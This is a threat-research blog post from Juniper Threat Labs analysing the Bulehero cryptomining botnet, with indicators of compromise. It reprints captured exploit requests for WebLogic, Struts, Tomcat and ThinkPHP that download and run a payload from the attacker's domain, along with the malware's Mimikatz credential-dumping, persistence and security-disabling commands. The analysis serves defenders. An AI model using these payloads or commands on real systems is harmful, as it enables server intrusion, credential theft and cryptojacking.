Threat Research
Stay on top of the latest threat research, information on in-the-wild cyber attacks and cyber operations from Juniper Threat Labs.
Juniper Employee , Juniper Employee Juniper Employee
Threat Research
Anatomy of the Bulehero Cryptomining Botnet
Feb 12, 2019

cover.png

 

Juniper Threat Labs recently discovered an attack campaign that installs a cryptominer and spreads throughout the network. This campaign is interesting as one of its techniques is to use the infamous EternalBlue exploit and DoublePulsar backdoor.

 

The attack campaign starts with an HTTP request that attempts to exploit several vulnerabilities of web application servers. Recently, this group has been active as they have added the ThinkPHP exploit to their arsenal. We’ve seen this exploit used for other campaigns as well as in an earlier Alibaba threat report. The following will detail the specific exploits and malware that the threat actors are using for this campaign.



Exploitation

 

Juniper Threat Labs started witnessing this group’s activity back in May 2018. During that time, they only used two exploits for their campaign. The first being an Apache Struts vulnerability and the second a Weblogic vulnerability.

 

In December 2018, we noticed a sudden rise in their activity. During this period, they added a few exploits to their arsenal. Aside from the two exploits mentioned above, which they continue to use, they have also added Tomcat and ThinkPHP exploits.

 

They use living-off-the-land techniques, such as using PowerShell, CertUtil, CMD and Wscript to download and execute their payload.

 

Weblogic Vulnerabilty (CVE-2017-10271)

 

Their exploit involves using powershell to download and execute their payload.

 

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Content-Type: text/xml

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Upgrade-Insecure-Requests: 1

Content-Length: 846

Host: {redacted}


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

   <soapenv:Header>

   <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

   <java version="1.8.0_131" class="java.beans.XMLDecoder">

   <void class="java.lang.ProcessBuilder">

   <array class="java.lang.String" length="3">

   <void index="0">

   <string>cmd</string>

   </void>

   <void index="1">

   <string>/c</string>

   </void>

   <void index="2">

   <string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46[.]bulehero[.]in/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>

   </void>

   </array>

   <void method="start"/></void>

   </java>

   </work:WorkContext>

   </soapenv:Header>

   <soapenv:Body/>

  </soapenv:Envelope>



Apache Struts 2 vulnerability (CVE-2017-9805)

Their exploit uses VBScript to download and execute their payload.

 

GET /struts2-rest-showcase/orders.xhtml HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)Smiley Sad(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c del C:/Windows/temp/searsvc.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/Windows/temp/searsvc.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/Windows/temp/searsvc.vbs&echo Post.Open "GET","http://a46[.]bulehero[.]in/downloader.exe",0 >>C:/Windows/temp/searsvc.vbs&echo Post.Send() >>C:/Windows/temp/searsvc.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/Windows/temp/searsvc.vbs&echo aGet.Mode = 3 >>C:/Windows/temp/searsvc.vbs&echo aGet.Type = 1 >>C:/Windows/temp/searsvc.vbs&echo aGet.Open() >>C:/Windows/temp/searsvc.vbs&echo aGet.Write(Post.responseBody) >>C:/Windows/temp/searsvc.vbs&echo aGet.SaveToFile "C:/Windows/temp/esentur.exe",2 >>C:/Windows/temp/searsvc.vbs&echo wscript.sleep 10000>>C:/Windows/temp/searsvc.vbs&echo Shell.Run ("C:/Windows/temp/esentur.exe")>>C:/Windows/temp/searsvc.vbs&C:/Windows/temp/searsvc.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}




Tomcat PUT arbitrary file upload vulnerability (CVE-2017-12615)

 

GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46[.]bulehero[.]in/download.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}




ThinkPHP vulnerabilty

 

There are two types of exploits targeting this vulnerability that depend on the filepath of the web app that it is trying to exploit. Both attacks use PowerShell to download and execute their payloads.



GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46[.]bulehero[.]in/download.exe','C:/14.exe');start%20C:/14.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}



GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46[.]bulehero[.]in/download.exe','C:/14.exe');start%20C:/14.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: 104.129.10.103

 

Installation

 

1st Stage Payload: Download.exe

 

The full payload is downloaded from one domain (a46[.]bulehero[.]in), in which this campaign is named. The payload, download.exe, will download and execute several files with different functions. Below is an overview of the system activity of Download.exe.

 

Download.exe

 

  • Creates a process xsvinmat.exe (found in the body)
  • Creates a service {random}.exe
    • Modular Plugin Component
    • Connects to a45[.]bulehero[.]in via TCP port 1356 to send and receive some data

  • Downloads a file from a46[.]bulehero[.]in via HTTP GET /docropool.exe. It saves the file as %TEMP%\docropool.exe and executes it.
  • Docropool.exe creates a separate process of itself at C:\Windows\docropool.exe
  • C:\Windows\docropool.exe will start several processes to install a cryptominer, weaken the system, stop some Windows services and spread across the network.
    • cmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt
    • C:\Windows\TEMP\Networks\taskmgr.exe
    • cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\docropool.exe"
    • cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\docropool.exe  /p everyone:F"
    • cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe  /p everyone:F"
    • cmd /c net stop SharedAccess (Internet Connection Service)
    • cmd /c net stop MpsSvc (Windows Firewall)
    • cmd /c net stop WinDefend (Windows Defender)
    • cmd /c net stop wuauserv (Windows Update)
    • cmd /c sc config SharedAccess start= disabled
    • cmd /c sc config MpsSvc start= disabled
    • cmd /c sc config WinDefend start= disabled
    • cmd /c sc config wuauserv start= disabled
    • cmd /c net stop LanmanServer (File Sharing)
    • cmd /c sc config LanmanServer start= disabled
    • C:\Windows\TEMP\wimnat.exe
    • cmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat
    • C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe

 

2nd Stage Payload: docropool.exe

We will regard this second stage as the main payload as it is the one that drops several components including XMRig Miner and spreader components. It includes the following configuration file for its mining and spreading function.

 

[UpdateNode]

Us=a47.bulehero.in

Kr=a48.bulehero.in

[MainUpdate]

MainVersion=20190114

MainExeName=docropool

MainSize=3769344

[Infect]

DownUrl=http://a46[.]bulehero[.]in/download.exe

[MinIng]

MineUpdate=Off

variant=--variant=-1

Address=4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh

MiningPool=pool.bulehero.in:7777

Algorithm=cryptonight

CPUOccuPancy=1



XMRig Miner

 

We believe that the primary goal of this campaign is to install a miner. When docropool.exe is executed, it then drops the XMRig miner file as C:\Windows\TEMP\Networks\taskmgr.exe and executes it. Based on the configuration file, it uses the mining pool “pool.bulehero.in:7777” and the wallet address is: 4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh.

 

We do not have accurate information about the current value of this wallet, but a Google search lists a Chinese website that has some information around malicious Monero wallets. At the time of their writing, this wallet had 157XMR, which is around $6,700.00 USD.

 

wallet.png

Snapshot from https://www.anquanke.com/post/id/169646



Spreading

 

This malware does not stop at running a cryptominer. It attempts to spread itself using three different techniques to create a cryptomining botnet. One technique it uses is of particular interest as it uses the EternalBlue exploit and DoublePulsar backdoor, which was used by the infamous Wannacry ransomware back in 2017. The following section will detail each spreading technique.

 

EternalBlue and DoublePulsar

 

This routine tries to execute the bulehero downloader on SMB ports 445 and 139 using EternalBlue exploit and DoublePulsar backdoor.

 

It drops the following files in C\Windows\InfusedAppe\LocalService directory:

  • AppCapture_x32.dll  (32-bit bulehero bot downloader)
  • AppCapture_x64.dll (64-bit bulehero bot downloader)
  • Spoolsrv.xml (EternalBlue config)
  • Svschost.xml (DoublePulsar config)
  • Specials\spoolsrv.exe (EternalBlue Component)
  • Specials\svschost.exe (DoublePulsar Backdoor)

 

The following routine, essentially executes AppCapture_x32.dll on the target machine if the exploit attack is successful. This dll will download and executes the file from the url, http://a46[.]bulehero[.]in/download.exe.


eternalblue.pngRoutine for running the EternalBlue and DoublePulsar to execute their payload



PsExec and Brute-Force Attacks

 

It drops the following files for this routine:

 

  • C:\Windows\InfusedAppe\Corporate\scvhost.exe (PsExec)
  • C:\Windows\InfusedAppe\Corporate\vfshost (Mimikatz)



Along with a list of usernames and passwords, it uses Mimikatz to obtain the local credentials. It then uses PsExec to execute Bulehero on shared folders in the network.


mimikatz.pngRoutine for running mimikatz



Web Application Exploits

It also scans the internal network and attempts to exploit vulnerable machines. The exploits used are the same as the exploitation method described above, but this routine specifically uses port 7001. This port is commonly tied to the Oracle Weblogic vulnerability, which it exploits.


exploit.pngWeblogic exploit for spreading

Miscellaneous

 

Port Scanner

 

To check if ports are open in the network, it uses a custom port scanner. This file is saved as C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe. It is being executed by the batch file as follows:



cd C:\Windows\InfusedAppe\Priess\

for /f "eol= tokens=1,2 delims= " %%i in (C:\Windows\InfusedAppe\Priess\ip.txt) do GoogleCdoeUpdate.exe tcp %%i %%j 445 256 /save

 

Ip.txt contains a list of network segments, e.g., 192.168.0.1 192.168.255.255. Aside from internal networks, it can also attack the external network subnet. It does this by getting the current machine’s public IP using http://2019[.]ip138[.]com/ic.asp and attacks the class C subnet of that public IP address.  For instance, if the machine’s public IP is 1.1.5.5, it will attempt to scan 1.1.0.1 to 1.1.255.255.




Disabling Windows Defender and Windows Services


The Bulehero malware disables the Windows Defender service, which is typical for malware, but it also disables Windows shares probably to avoid reinfection of the system or to avoid other competing botnets to control the system.

 

Command

Description

cmd /c net stop SharedAccess

Disables Internet Connection Sharing Service

cmd /c net stop MpsSvc

Disables Windows Firewall

cmd /c net stop WinDefend

Disables Windows Defender

cmd /c net stop wuauserv

Disables Windows Update

cmd /c net stop LanmanServer

Disables Windows Sharing



Conclusion

 

This campaign is one of several that we have seen that targets Windows servers. The threat actor’s goal is to essentially install a cryptomining bot that also moves laterally across the local network and is capable of spreading to public IPs. There is no doubt that installing cryptomining trojans seems to be a lucrative business for hackers as we have been seeing an upward trend of this activity not only on Windows, but also on Linux and IoT platforms.

 

This campaign is also interesting as it combines high-profile techniques into its arsenal, such as the EternalBlue exploit and DoublePulsar backdoor used in the infamous Wannacry ransomware. The attack strategy is also developing as they are expanding their attack exploits arsenal. One downside of this group’s TTP (Techniques, Tactics and Procedure) is their infrastructure. Since their discovery last May 2018 until now, they have not changed their download and C2 domain, which can be easily blocked once identified.




Juniper security products, JATP Appliance and Sky ATP detect these threats as follows:


skyatp.png

jatp.png

 

IOC

 

a16243c45805e2b249babf3115915730c7b91b378f6a6795fac08436c0e75943

Download.exe  (bulehero payload)

6c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e

{random}.exe

100b49c780ac60366ff07517b96d4b090f3a420d24d5200b9252c5e0eab38380

Docropool.exe (bulehero payload)

6c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e

Wimnat.exe (Dropped File)

4f373fa25fc58276de03da3b272b919364b5aae450b01e3fab956144a9b46557

Taskmgr.exe (XMRig Miner)

e9d63863740aa65b74376cf5393a881126a5bd3ce7bb082cbdd448040edb515c

GoogleCdoeUpdate.exe (Port Scanner)

ca14bd815fe851c98895840a1e543f8113d5068afbbb3c35207fb7c2acddc0e5

Scvhost.exe (PSExec)

be94f254037e10393078b3e25496d59fe92f0e08dcd69c51b3b64490db568ba6

Vfshost.exe (Mimikatz)

a45[.]bulehero[.]in

CnC domain

a46[.]bulehero[.]in

Download domain

139.162.114.11

Download IP